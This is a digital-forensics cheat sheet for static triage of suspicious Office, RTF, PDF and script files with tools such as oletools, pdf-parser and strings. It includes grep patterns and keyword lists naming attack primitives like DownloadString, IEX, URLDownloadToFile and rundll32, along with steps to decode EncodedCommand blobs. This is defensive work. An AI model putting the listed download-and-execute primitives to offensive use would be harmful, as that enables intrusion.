file::analysis

dfir file triage PE · ELF · scripts
TriageOfficeMacros PDFPowerShellExtract / Decode IOC HuntSafe DynamicWorkflow
01Initial Triage
Baseline commands
# Never execute first. Start with identity + metadata.
sha256sum sample
file sample
stat sample
exiftool sample
strings -n 6 sample | less
strings -el sample | less   # UTF-16LE / wide strings
binwalk sample
ent sample                      # quick entropy signal

# Fast grep for obvious indicators
strings sample | grep -iE "http|powershell|cmd\.exe|rundll32|regsvr32|FromBase64String|URLDownloadToFile|flag"
strings -el sample | grep -iE "powershell|http|\.exe|\.dll|Enable-Macros"
What you are trying to answer
# Questions to answer before deeper analysis
- What is the real file type?
- Is it a container? (zip / OOXML / PDF with embedded file)
- Is there scripting? (VBA / JS / PowerShell)
- Is there obfuscation? (base64 / hex / XOR / compression)
- Is there an execution trigger?
  - Office: AutoOpen / Document_Open / Workbook_Open
  - PDF: /OpenAction / /AA / JavaScript / Launch
- Are there remote references?
  - URL / UNC path / template injection / remote object
Red flags
High entropy                 → packed / encrypted / compressed blob
Wide strings only            → often PowerShell / Windows-centric sample
Office file with macros      → go straight to oletools
PDF with /JS /Launch         → suspicious interaction or exploit path
External template / remote URL → staging or lure document
Many object streams          → PDF object hiding / obfuscation
Base64 in wide strings       → often EncodedCommand or staged script
02Office Documents
Identify the Office family
# Modern Office = OOXML zip container
.docx / .xlsx / .pptx  → ZIP-based XML package
.docm / .xlsm / .pptm  → ZIP-based + macros allowed

# Legacy Office = OLE compound document
.doc / .xls / .ppt      → OLE / CFBF

# Quick identification
file invoice.docm
oleid invoice.docm
zipinfo invoice.docm           # OOXML internals if zip-based
7z l invoice.docm              # list contents safely
OOXML internals to inspect
# Unpack to inspect XML relationships and embeds
mkdir oo && 7z x sample.docm -ooo
find oo -maxdepth 3 -type f | sort

# Interesting files / paths
[Content_Types].xml
_rels/.rels
word/document.xml
word/_rels/document.xml.rels
word/vbaProject.bin          # macros
word/embeddings/             # embedded OLE / package
word/media/                  # images / possible lure
customXml/                   # staging / hidden data sometimes

# Search relationships / URLs / template injection
grep -RniE "http|https|mhtml|file://|\\\\|template|oleObject|external" oo/
Legacy OLE docs
oleid sample.doc
oledump.py sample.doc
oledump.py -i sample.doc      # stream indicators
olemeta sample.doc

# Common suspicious streams
Macros / VBA
ObjectPool
Ole10Native                  # dropped file / embedded package
\x01CompObj / \x05SummaryInfo

# Extract embedded data / stream
oledump.py -s 8 -d sample.doc > stream.bin
03Macros, DDE & Office-Specific TTPs
Oletools workflow
oleid sample.docm             # macro / encrypted / external refs
olevba sample.docm            # dump VBA, compressed streams
olevba --decode sample.docm  # decode VBA strings
mraptor sample.docm           # macro suspicion scoring
msodde sample.doc            # DDE abuse detection

# Search for execution primitives
olevba sample.docm | grep -iE "AutoOpen|Document_Open|Workbook_Open|Shell|CreateObject|WScript\.Shell|PowerShell|cmd\.exe|URLDownloadToFile|XMLHTTP|ADODB\.Stream"
What to look for in macros
# Typical malicious flow
1. Auto* trigger
2. String building / obfuscation
3. Decode blob (base64 / hex / split chars)
4. Write file (ADODB.Stream)
5. Execute via Shell / WMI / rundll32 / regsvr32 / PowerShell

# Suspicious keywords
CreateObject
GetObject
Shell
WScript.Shell
MSXML2.XMLHTTP
WinHttp.WinHttpRequest
ADODB.Stream
Environ
Chr / Asc / StrReverse / Replace / Split
FromBase64String / Base64Decode

# Template injection / remote object clues
attachedTemplate
mhtml:
http://
https://
\\server\share\template.dotm
RTF / lure document notes
# RTF can carry embedded OLE / exploit markers
file sample.rtf
rtfobj sample.rtf
strings sample.rtf | grep -iE "objdata|objclass|equation|ole2link|powershell|cmd"

# If object extracted
rtfobj -s all sample.rtf
foremost -i extracted.bin -o out/

# Phishing-ish signs
- fake invoice / shipping theme
- images urging "Enable Content"
- tiny / hidden OLE object
- one-stage downloader macro
04PDF Analysis
Fast PDF triage
pdfid.py sample.pdf
pdf-parser.py -a sample.pdf
peepdf -f sample.pdf
pdfinfo sample.pdf
qpdf --check sample.pdf

# pdfid flags that deserve attention
/JS /JavaScript
/OpenAction
/AA
/Launch
/EmbeddedFile
/ObjStm
/XFA
/RichMedia
/AcroForm
Object inspection with pdf-parser
# Overview + suspicious objects
pdf-parser.py -a sample.pdf
pdf-parser.py --search javascript sample.pdf
pdf-parser.py --search OpenAction sample.pdf
pdf-parser.py --search EmbeddedFile sample.pdf

# Inspect one object and decode streams
pdf-parser.py -o 12 sample.pdf
pdf-parser.py -o 12 -f sample.pdf         # apply filters
pdf-parser.py -o 12 -w sample.pdf         # dump raw stream
pdf-parser.py -o 12 -d obj12.bin sample.pdf
What specifically to inspect
# Common malicious / suspicious features
/OpenAction                  # auto action on open
/AA                          # additional actions
/JS /JavaScript              # embedded JS
/Launch                      # command or file launch
/EmbeddedFile                # dropped content / lure
/ObjStm                      # object streams hide objects
/XFA                         # interactive forms, often abused
/URI                         # external URL
/SubmitForm                  # exfil / callback possibility

# Quick grep after dumping
strings sample.pdf | grep -iE "/JS|/OpenAction|http|cmd|powershell|launch|uri"
Embedded files & attachments
# qpdf and mutool can help rebuild / inspect
mutool show sample.pdf trailer
mutool show sample.pdf 12
mutool extract sample.pdf     # extract embedded files when possible
pdfdetach -list sample.pdf
pdfdetach -saveall sample.pdf

# Then triage extracted payloads
file extracted/*
sha256sum extracted/*
oledump.py suspicious.bin      # if extracted object is OLE
JavaScript in PDF
# Dump JS-ish streams and beautify
pdf-parser.py --search /JS sample.pdf
pdf-parser.py -o 23 -f -d js23.bin sample.pdf
js-beautify js23.bin > js23.pretty.js

# Things to search for
app.launchURL
this.submitForm
exportDataObject
util.printf
unescape
fromCharCode
replace / split / reverse
heap spraying patterns

# PDFs also hide data in encoded streams
FlateDecode
ASCIIHexDecode
ASCII85Decode
RunLengthDecode
Practical PDF workflow
pdfid.py sample.pdf
pdf-parser.py -a sample.pdf
pdf-parser.py --search OpenAction sample.pdf
pdf-parser.py --search JS sample.pdf
pdfdetach -saveall sample.pdf
mutool extract sample.pdf
strings sample.pdf | grep -iE "http|powershell|cmd|OpenAction|Launch"

# If JS or embedded file appears, pivot to that artifact
05Encoded PowerShell & Obfuscated Script Recovery
Find PowerShell hidden in files
strings sample | grep -i powershell
strings -el sample | grep -i powershell
grep -aoiE "-enc|-encodedcommand|FromBase64String|IEX|Invoke-Expression" sample

# Wide / OOXML / macro outputs often contain UTF-16LE text
strings -el sample | grep -iE "FromBase64String|New-Object|DownloadString|WebClient|Invoke-Expression"
Decode common EncodedCommand
# PowerShell -enc is usually UTF-16LE bytes then base64
echo 'BASE64_HERE' | base64 -d | iconv -f UTF-16LE -t UTF-8

# Save from strings output and decode
cat blob.b64 | tr -d '\n' | base64 -d | iconv -f UTF-16LE

# If not UTF-16LE, try raw UTF-8
echo 'BASE64_HERE' | base64 -d
Typical script deobfuscation steps
# Common stages
- Join split strings
- Replace [char] / Chr() sequences
- Decode base64 / hex
- Reverse strings
- Gzip / Deflate decompress
- Find final command or URL

# Useful patterns to grep
FromBase64String
GZipStream
DeflateStream
IEX
DownloadString
Invoke-WebRequest
Start-BitsTransfer
Reflection.Assembly

# If script is one line, reformat before reasoning
sed 's/;/;\n/g' script.ps1 | less
06Extraction, Decode & Unpack
Archives / containers
7z l sample
7z x sample
unzip -l sample.zip
tar -tf sample.tar
cabextract sample.cab
Carving / embedded content
binwalk -e sample
foremost -i sample -o carve/
bulk_extractor -o bulk/ sample
Encodings
base64 -d
xxd -r -p
python3 -c "import zlib,sys;print(zlib.decompress(sys.stdin.buffer.read()))"
07IOC Hunting & Pivots
Useful greps
strings sample | grep -E "http[s]?://|\\\\[A-Za-z0-9._$-]+\\|[0-9]{1,3}(\.[0-9]{1,3}){3}"
strings sample | grep -iE "user-agent|cookie|api|token|cmd|rundll32|schtasks|reg add|mshta|wscript|cscript"
strings -el sample | grep -iE "http|powershell|download|template|payload|dll"
YARA / signatures
yara rules.yar sample
yara -r rules/ sample_dir/

# Good pivot targets for YARA later
URLs / domains
macro keywords
PDF JavaScript API names
PowerShell decode primitives
known mutex / paths / strings
Section-wise interpretation
# High confidence suspicious combinations
Office macro + AutoOpen + URLDownloadToFile
PDF /OpenAction + /JS + /EmbeddedFile
Wide strings + -enc + FromBase64String
OOXML relationship to remote template
RTF with embedded OLE + powershell strings

# Low confidence alone
High entropy only
Long base64 only
External URL only
One suspicious keyword only
08Safe Dynamic Checks (Lab Only)
Minimal safe dynamic approach
# Use a disposable VM snapshot, no production system
- snapshot first
- disable shared folders
- isolate network or use controlled gateway
- record hashes before / after

# Linux payloads
strace -f -o strace.log ./sample
ltrace -o ltrace.log ./sample

# Document-focused dynamic checks belong in Windows lab, not REMnux
- open suspicious Office/PDF only in disposable VM
- capture process tree, file writes, net connections
REMnux-friendly pivot tools
inetsim                    # fake services / sinkhole
tcpdump -i any -w run.pcap
fakenet-ng                 # if available in your lab workflow
python3 -m http.server 8000 # simple callback sink only

# Dynamic analysis goals
- confirm URL / C2 path
- confirm dropped file names
- confirm exact PowerShell line
- confirm persistence attempt
09Practical Workflow
Suspicious file playbook
# 1. Identify
sha256sum sample
file sample
exiftool sample
strings -n 6 sample | less
strings -el sample | less

# 2. Branch on file type
Office → oleid / olevba / oledump.py / unzip OOXML
PDF    → pdfid.py / pdf-parser.py / peepdf / pdfdetach
Archive → 7z / binwalk / foremost

# 3. Recover logic
Find macros / JS / EncodedCommand / URLs / embedded files
Decode base64 / UTF-16LE / compressed blobs

# 4. Pivot
Extract payloads → analyze them as new samples
Build IOC list: URLs, domains, hashes, file names, commands

# 5. Only then consider controlled dynamic analysis
REMNUX NOTE Use REMnux for safe static triage and extraction. Open live Office or PDF payloads only inside a disposable, isolated Windows VM when you need behavior confirmation.